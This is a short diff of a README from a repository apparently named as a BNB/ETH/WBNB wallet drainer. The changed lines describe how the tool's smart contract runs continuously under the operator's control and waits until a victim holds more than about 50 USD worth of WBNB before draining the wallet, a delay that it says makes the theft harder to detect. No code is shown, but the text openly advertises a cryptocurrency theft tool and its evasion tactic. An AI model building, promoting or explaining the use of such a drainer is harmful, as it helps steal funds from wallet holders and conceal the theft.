rayrock73/bnb-eth-wbnb-wallet-drainer/README.md

 4. the smart contract runs from the script in your fork and is running 24/7 so you have full control

-5. If the victim has less than 50 busd in there wallet it will not drain it so its harder to detect it waits for the victim to get a certain amount of busd
+5. If the victim has less than 50 usd worth of wbnb in there wallet it will not drain it so its harder to detect it waits for the victim to get a certain amount of busd

 Deploy steps